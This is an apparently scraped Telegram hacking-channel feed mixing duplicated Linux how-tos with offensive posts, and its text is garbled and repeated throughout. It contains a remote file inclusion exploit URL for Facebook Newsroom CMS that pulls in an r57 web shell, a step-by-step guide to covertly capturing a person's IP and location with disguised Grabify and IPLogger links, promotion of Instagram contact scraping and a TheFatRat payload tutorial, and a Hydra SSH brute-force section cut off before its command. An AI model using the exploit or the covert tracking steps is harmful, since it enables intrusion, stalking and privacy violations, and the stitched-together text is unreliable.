Forwarded from UNDERCODE NEWS
Microsoft removes 18 Azure Active Directory apps after being abused by Chinese hackers
#CyberAttacks
_
#CyberAttacks
_
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to determine when the Linux operating system was booted ? #ForAdvanced
1) There is a simple solution, because we can directly use the / proc filesystem.
Use the / proc / stat file which contains kernel / system statistics.
$ cat / proc / stat
cpu 13014200 24406 4799169 40794104 34102 0 96456 0 0 0
cpu0 3273277 5052 1208241 30257443 16180 0 30562 0 0 0
cpu1 3258376 6672 1187026 3510180 8958 0 25642 0 0 0
cpu2 3266882 6158 1193469 3501113 4998 0 29868 0 0 0
cpu3 3215665 6523 1210432 3525367 3964 0 10383 0 0 0
intr 539439101 9 389 0 0 0 0 0 15646 1 2595538 0 0 15 0 0 0 0 0 0 0 0 347 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 253 0 0 0 0 1483731 313 4800809 44745763 0 7901501 18 629 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ctxt 2042251595
btime 1578304868
processes 196905
procs_running 1
procs_blocked 0
softirq 310354343 39361834 94774221 414 442124 4311767 39 489577 97929159 0 73045208
2) Let's calculate the btime value, which contains the loading time in seconds since the start.
$ awk '/ btime / {print $ 2}' / proc / stat
1578304868
3) Convert seconds from start to date using awk, xargs and date.
$ awk '/ btime / {print $ 2}' / proc / stat | xargs -IUNIX_TIMESTAMP date --date @UNIX_TIMESTAMP
Mon Jan 6 11:01:08 CET 2020
4) Convert seconds elapsed from start to date using awk and date.
$ awk '/ btime / {command = "date --date @" $ 2; system (command)}' / proc / stat
Mon Jan 6 11:01:08 CET 2020
5) Convert seconds to date using only awk.
$ awk '/ btime / {print strftime ("% a% b% e% H:% M:% S% Z% Y", $ 2)}' / proc / stat
Mon Jan 6 11:01:08 CET 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to determine when the Linux operating system was booted ? #ForAdvanced
1) There is a simple solution, because we can directly use the / proc filesystem.
Use the / proc / stat file which contains kernel / system statistics.
$ cat / proc / stat
cpu 13014200 24406 4799169 40794104 34102 0 96456 0 0 0
cpu0 3273277 5052 1208241 30257443 16180 0 30562 0 0 0
cpu1 3258376 6672 1187026 3510180 8958 0 25642 0 0 0
cpu2 3266882 6158 1193469 3501113 4998 0 29868 0 0 0
cpu3 3215665 6523 1210432 3525367 3964 0 10383 0 0 0
intr 539439101 9 389 0 0 0 0 0 15646 1 2595538 0 0 15 0 0 0 0 0 0 0 0 347 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 253 0 0 0 0 1483731 313 4800809 44745763 0 7901501 18 629 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ctxt 2042251595
btime 1578304868
processes 196905
procs_running 1
procs_blocked 0
softirq 310354343 39361834 94774221 414 442124 4311767 39 489577 97929159 0 73045208
2) Let's calculate the btime value, which contains the loading time in seconds since the start.
$ awk '/ btime / {print $ 2}' / proc / stat
1578304868
3) Convert seconds from start to date using awk, xargs and date.
$ awk '/ btime / {print $ 2}' / proc / stat | xargs -IUNIX_TIMESTAMP date --date @UNIX_TIMESTAMP
Mon Jan 6 11:01:08 CET 2020
4) Convert seconds elapsed from start to date using awk and date.
$ awk '/ btime / {command = "date --date @" $ 2; system (command)}' / proc / stat
Mon Jan 6 11:01:08 CET 2020
5) Convert seconds to date using only awk.
$ awk '/ btime / {print strftime ("% a% b% e% H:% M:% S% Z% Y", $ 2)}' / proc / stat
Mon Jan 6 11:01:08 CET 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦For beginers by undercode What is the principle of DDoS attack? Introduction to the principle of DDoS attack and protective measures
1) Definition of DDoS
The predecessor of DDos, the DoS (DenialofService) attack, means a denial of service attack. This attack behavior makes the website server flooded with a large amount of information requesting a reply, consumes network bandwidth or system resources, and causes the network or system to be overloaded and stop providing normal network service.
The DDoS distributed denial of service mainly uses the vulnerabilities of existing machines and systems on the Internet to capture a large number of networked hosts and make them a proxy for attackers.
When the number of controlled machines reaches a certain number, the attacker sends instructions to manipulate these attacking machines to launch DoS attacks on the target host or network at the same time, which consumes a large amount of its network belt and system resources, causing the network or system to be paralyzed or stop providing normal networks service. Due to the distributed nature of DDos, it has far more powerful attack and destructive power than Dos.
2) The principle of DDoS attack
look at picture a relatively complete DDos attack system is divided into four parts, namely the attacker (attacker can also be called master), control puppet machine (handler), attack puppet machine (demon, also called agent) and Victim.
Part 2 and Part 3 are used for control and actual attack. The control machine in the second part only issues orders and does not participate in the actual attack, and the third part attacks the actual DDoS attack package on the puppet machine.
For the second and third part of the computer, the attacker has control or partial control, and uploads the corresponding DDoS program to these platforms. These programs run like normal programs and wait for instructions from the attacker. Usually It also uses various means to hide itself from being discovered by others. In normal times, there is nothing unusual about these puppet machines, but once an attacker connects to them to control and issue instructions, the attacking puppet machine becomes the attacker to launch an attack.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦For beginers by undercode What is the principle of DDoS attack? Introduction to the principle of DDoS attack and protective measures
1) Definition of DDoS
The predecessor of DDos, the DoS (DenialofService) attack, means a denial of service attack. This attack behavior makes the website server flooded with a large amount of information requesting a reply, consumes network bandwidth or system resources, and causes the network or system to be overloaded and stop providing normal network service.
The DDoS distributed denial of service mainly uses the vulnerabilities of existing machines and systems on the Internet to capture a large number of networked hosts and make them a proxy for attackers.
When the number of controlled machines reaches a certain number, the attacker sends instructions to manipulate these attacking machines to launch DoS attacks on the target host or network at the same time, which consumes a large amount of its network belt and system resources, causing the network or system to be paralyzed or stop providing normal networks service. Due to the distributed nature of DDos, it has far more powerful attack and destructive power than Dos.
2) The principle of DDoS attack
look at picture a relatively complete DDos attack system is divided into four parts, namely the attacker (attacker can also be called master), control puppet machine (handler), attack puppet machine (demon, also called agent) and Victim.
Part 2 and Part 3 are used for control and actual attack. The control machine in the second part only issues orders and does not participate in the actual attack, and the third part attacks the actual DDoS attack package on the puppet machine.
For the second and third part of the computer, the attacker has control or partial control, and uploads the corresponding DDoS program to these platforms. These programs run like normal programs and wait for instructions from the attacker. Usually It also uses various means to hide itself from being discovered by others. In normal times, there is nothing unusual about these puppet machines, but once an attacker connects to them to control and issue instructions, the attacking puppet machine becomes the attacker to launch an attack.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
medium_com_growmeorganic_how_to_extract_bulk_emails_and_phone_numbers.pdf
2 MB
EXTRACT PHONE NUMBER & EMAIL FROM INSTAGRAM :
What data can you export with GrowMeOrganic?
Instagram Username
Full Name
Phone Number
Website
Bio
Country
City
Zip Code
Address
Followers Count
Following Count
Is Business
Category
Business Potential (Using Instagram AI)
Is Private
Is Verified
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE SECURITY
Be careful what you OSINT with.pdf
3.3 MB
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability :
Discovered by : Ciph3r
# MAIL : Ciph3r_blackhat@yahoo.com
# SP tanx4: Iranian hacker & Kurdish security TEAM
# sp TANX2: milw0rm.com & google.com & sourceforge.net
#
# CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515
# class : remote
# risk : high
# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d
#####################################################
# C0de :
# require_once ($path.'/classes/feedStories.class.php');
EXPLOIT :
www.[Target].com/path/includes/home.php?path=[r57.txt?]
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability :
Discovered by : Ciph3r
# MAIL : Ciph3r_blackhat@yahoo.com
# SP tanx4: Iranian hacker & Kurdish security TEAM
# sp TANX2: milw0rm.com & google.com & sourceforge.net
#
# CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515
# class : remote
# risk : high
# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d
#####################################################
# C0de :
# require_once ($path.'/classes/feedStories.class.php');
EXPLOIT :
www.[Target].com/path/includes/home.php?path=[r57.txt?]
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
sourceforge.net
Newsroom Application for Facebook - Browse Files at SourceForge.net
An open source application for Facebook which can be easily used by non-profits and non-government organizations to quickly install a basic Facebookβ¦
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Overview of Android hierarchical security architecture and core components :
#FastTips
The Android system inherits the security features of the Linux open source operating system and uses a hierarchical approach to ensure system security. This article will introduce the Android hierarchical security architecture and its core components in detail.
1) The Android system inherits the security features of the Linux open source operating system and uses a hierarchical approach to ensure system security.
Android uses Linux 2.6 as the operating system, Linux 2.6 is a standard technology, and Linux is also an open operating system. Android's use of the operating system includes two parts: the core and the driver. The Linux core of Android is the standard Linux 2.6 kernel. Android needs more drivers related to mobile devices.
π¦The main drivers are as follows:
Display driver (DisplayDriver): commonly used Linux-based frame buffer (Frame Buffer) driver
Flash memory driver (FlashMemory Driver)
Camera driver (CameraDriver): commonly used Linux-based v4l (Video for) driver.
Audio Driver (AudioDriver): commonly used based on ALSA (Advanced Linux Sound Arc..
2) Various libraries (Libraries) and Android runtime environment (RunTime)
This level corresponds to the general embedded system and is equivalent to the middleware level. This level of Android is divided into two parts, one is various libraries, and the other is the Android runtime environment. The content of this layer is mostly implemented in C++. Among them, various libraries include:
C library: The standard library of C language, which is also one of the lowest level libraries in the system.
3) Application Framework (ApplicationFramework)
The Android application framework provides APIs for developers at the application layer. It is actually an application framework. Since the upper-level application is built in JAVA, the first level provided by this level includes the various controls needed in the UI program: for example: Views (view components) include lists (list), grids (grid), textboxes Text box), buttons (buttons), etc., and even an embedded Web browser. An Android application can make use of the following parts in the application framework: Activity, Broadcast IntentReceiver, Service, Content Provider.
4) Application
Android applications are mainly user interface (UserInterface), usually written in JAVA program, which can also contain various resource files (placed in the res directory). After the JAVA program and related resources are compiled, an APK package will be generated. Android itself provides many core applications such as the home screen (Home), contacts (Contact), phone (Phone), browser (Browsers) and so on. At the same time, application developers can also use the API of the application framework layer to implement their own programs.
#FastTips
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Overview of Android hierarchical security architecture and core components :
#FastTips
The Android system inherits the security features of the Linux open source operating system and uses a hierarchical approach to ensure system security. This article will introduce the Android hierarchical security architecture and its core components in detail.
1) The Android system inherits the security features of the Linux open source operating system and uses a hierarchical approach to ensure system security.
Android uses Linux 2.6 as the operating system, Linux 2.6 is a standard technology, and Linux is also an open operating system. Android's use of the operating system includes two parts: the core and the driver. The Linux core of Android is the standard Linux 2.6 kernel. Android needs more drivers related to mobile devices.
π¦The main drivers are as follows:
Display driver (DisplayDriver): commonly used Linux-based frame buffer (Frame Buffer) driver
Flash memory driver (FlashMemory Driver)
Camera driver (CameraDriver): commonly used Linux-based v4l (Video for) driver.
Audio Driver (AudioDriver): commonly used based on ALSA (Advanced Linux Sound Arc..
2) Various libraries (Libraries) and Android runtime environment (RunTime)
This level corresponds to the general embedded system and is equivalent to the middleware level. This level of Android is divided into two parts, one is various libraries, and the other is the Android runtime environment. The content of this layer is mostly implemented in C++. Among them, various libraries include:
C library: The standard library of C language, which is also one of the lowest level libraries in the system.
3) Application Framework (ApplicationFramework)
The Android application framework provides APIs for developers at the application layer. It is actually an application framework. Since the upper-level application is built in JAVA, the first level provided by this level includes the various controls needed in the UI program: for example: Views (view components) include lists (list), grids (grid), textboxes Text box), buttons (buttons), etc., and even an embedded Web browser. An Android application can make use of the following parts in the application framework: Activity, Broadcast IntentReceiver, Service, Content Provider.
4) Application
Android applications are mainly user interface (UserInterface), usually written in JAVA program, which can also contain various resource files (placed in the res directory). After the JAVA program and related resources are compiled, an APK package will be generated. Android itself provides many core applications such as the home screen (Home), contacts (Contact), phone (Phone), browser (Browsers) and so on. At the same time, application developers can also use the API of the application framework layer to implement their own programs.
#FastTips
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST FREE TV APPS FOR PHONE 2020 :
https://play.google.com/store/apps/details?id=live.free.tv_us&hl=en_US
https://play.google.com/store/apps/details?id=com.hulu.plus
https://apps.apple.com/us/app/hulu-watch-tv-shows-movies/id376510438
https://play.google.com/store/apps/details?id=com.jio.jioplay.tv
https://apps.apple.com/us/app/jiotv-live-tv-catch-up/id1060965205
https://play.google.com/store/apps/details?id=com.sonyliv
https://apps.apple.com/in/app/sonyliv-live-cricket-tv-movies/id587794258
https://play.google.com/store/apps/details?id=com.mxtech.videoplayer.ad
https://apps.apple.com/in/app/mx-player/id1429703801
https://play.google.com/store/apps/details?id=com.tubitv&hl=en
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST FREE TV APPS FOR PHONE 2020 :
https://play.google.com/store/apps/details?id=live.free.tv_us&hl=en_US
https://play.google.com/store/apps/details?id=com.hulu.plus
https://apps.apple.com/us/app/hulu-watch-tv-shows-movies/id376510438
https://play.google.com/store/apps/details?id=com.jio.jioplay.tv
https://apps.apple.com/us/app/jiotv-live-tv-catch-up/id1060965205
https://play.google.com/store/apps/details?id=com.sonyliv
https://apps.apple.com/in/app/sonyliv-live-cricket-tv-movies/id587794258
https://play.google.com/store/apps/details?id=com.mxtech.videoplayer.ad
https://apps.apple.com/in/app/mx-player/id1429703801
https://play.google.com/store/apps/details?id=com.tubitv&hl=en
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
FREECABLEΒ© TV App: Shows, News - Apps on Google Play
Stream & watch 3000+ live channels, TV shows, series, movies, news & sports
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to build Debian packages from source ?
Install the required build tools
To build a binary package from source, we first need to install the required build tools. Depending on the command line tool to build the binary package, you may need to install any of the following packages:
1-dpkg-dev
2-devscripts
1) These packages provide many tools for building binary packages from source.
To install "dpkg-dev", run:
$ sudo apt install dpkg-dev
2) To install the βdevscriptsβ package, use the following command:
$ sudo apt install devscripts
3) Include source repositories
Make sure you enable the source repositories.
4) To do this, open the file /etc/apt/sources.list:
$ sudo vim /etc/apt/sources.list
5) You will see several lines in it as shown below:
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://in.archive.ubuntu.com/ubuntu focal main restricted
# deb-src http://in.archive.ubuntu.com/ubuntu focal main restricted
[...]
6) To download the source packages, you need to uncomment the "deb-src" line. Remove the # character to uncomment the line. After uncommenting, the repository lines should look like this:
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://in.archive.ubuntu.com/ubuntu focal main restricted
deb-src http://in.archive.ubuntu.com/ubuntu focal main restricted
[...]
Save and close the file. Update the list of repositories using the command:
$ sudo apt update
7) Download source packages
Download the source code of the package using the command βapt source <package-name>β. For example, the following command will download the source code for βgrayex World!β program:
$ apt source yourname
8) Modify debian package source
Cd to the directory containing the package source code.
$ cd yourname-1.10
9) Modify the code as you wish. The code is located in the file "andreyex.c" in the "src" directory.
$ vi src / yourname.c
10) Change the code and / or make any changes. After editing the code, save and close the file.
It's time to create the actual .deb package.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to build Debian packages from source ?
Install the required build tools
To build a binary package from source, we first need to install the required build tools. Depending on the command line tool to build the binary package, you may need to install any of the following packages:
1-dpkg-dev
2-devscripts
1) These packages provide many tools for building binary packages from source.
To install "dpkg-dev", run:
$ sudo apt install dpkg-dev
2) To install the βdevscriptsβ package, use the following command:
$ sudo apt install devscripts
3) Include source repositories
Make sure you enable the source repositories.
4) To do this, open the file /etc/apt/sources.list:
$ sudo vim /etc/apt/sources.list
5) You will see several lines in it as shown below:
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://in.archive.ubuntu.com/ubuntu focal main restricted
# deb-src http://in.archive.ubuntu.com/ubuntu focal main restricted
[...]
6) To download the source packages, you need to uncomment the "deb-src" line. Remove the # character to uncomment the line. After uncommenting, the repository lines should look like this:
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://in.archive.ubuntu.com/ubuntu focal main restricted
deb-src http://in.archive.ubuntu.com/ubuntu focal main restricted
[...]
Save and close the file. Update the list of repositories using the command:
$ sudo apt update
7) Download source packages
Download the source code of the package using the command βapt source <package-name>β. For example, the following command will download the source code for βgrayex World!β program:
$ apt source yourname
8) Modify debian package source
Cd to the directory containing the package source code.
$ cd yourname-1.10
9) Modify the code as you wish. The code is located in the file "andreyex.c" in the "src" directory.
$ vi src / yourname.c
10) Change the code and / or make any changes. After editing the code, save and close the file.
It's time to create the actual .deb package.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦for beginers How to find out someone else's IP (anyone) by sending him a link ?
A) IP logger
IP Logger URL Shortener allows you to track and log IP addresses, GPS location.
IP Logger URL Shortener provides IP address access checker, check what my IP services are, counters and informants.
Step 1. Go to the page https://iplogger.org.
Step 2. Select an option. Location Tracking, Image / Link, Invisible Logger
Step 3: For the purposes of this tutorial, we will be using URL Shortener.
Enter the URL and click Get Logger Code.
Step 4: Copy the IPLogger link for collecting statistics (no BB codes)
Step 5: Remember the IPLogger ID (required to access the registration statistics!), You will need it later to get registered IP addresses.
https://iplogger.org
B) Grabify
Grabify IP Logger allows you to track who clicked on your links. find IP addresses from Facebook, Twitter, friends on other sites.
Step 1: go to https://grabify.link
Step 2. Enter a webpage link to the Grabify website and click the Generate URL button,
Step 3: You will now have a new tracking link like for example. https://grabify.link/GK9OK5 you can use the button below to change the domain of the link to another domain that is less recognizable, or you can use your own domain.
Step 4: Save the tracking code or connection link you will need to get the IP addresses of those who clicked on your Grabify link.
https://grabify.link
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦for beginers How to find out someone else's IP (anyone) by sending him a link ?
A) IP logger
IP Logger URL Shortener allows you to track and log IP addresses, GPS location.
IP Logger URL Shortener provides IP address access checker, check what my IP services are, counters and informants.
Step 1. Go to the page https://iplogger.org.
Step 2. Select an option. Location Tracking, Image / Link, Invisible Logger
Step 3: For the purposes of this tutorial, we will be using URL Shortener.
Enter the URL and click Get Logger Code.
Step 4: Copy the IPLogger link for collecting statistics (no BB codes)
Step 5: Remember the IPLogger ID (required to access the registration statistics!), You will need it later to get registered IP addresses.
https://iplogger.org
B) Grabify
Grabify IP Logger allows you to track who clicked on your links. find IP addresses from Facebook, Twitter, friends on other sites.
Step 1: go to https://grabify.link
Step 2. Enter a webpage link to the Grabify website and click the Generate URL button,
Step 3: You will now have a new tracking link like for example. https://grabify.link/GK9OK5 you can use the button below to change the domain of the link to another domain that is less recognizable, or you can use your own domain.
Step 4: Save the tracking code or connection link you will need to get the IP addresses of those who clicked on your Grabify link.
https://grabify.link
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
IPLogger
IP Logger URL Shortener - Log and Track IP addresses
IP Logger URL Shortener allows to track IP address and track locations, provides IP lookup and IP grabber services and lets you check what is my ip, use URL tracker.
Hack_Windows,_Android,_Mac_using_TheFatRat_Step_by_Step_tutorial
5.9 MB
hack android & windows via payloads with pictures
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Brute SSH the remote server :
1) For brute-force attacks (brute-force attacks), we will use the Hydra tool , which is included with the Kali Linux distribution. SSH is present on any Linux or Unix server and is generally the primary use for administrators to access and control their systems.
Warning: Hydra is an attack tool
β Use it only on your own systems and networks unless you have written permission from the owner. Otherwise, it is illegal . "
2) To implement the attack, use the command:
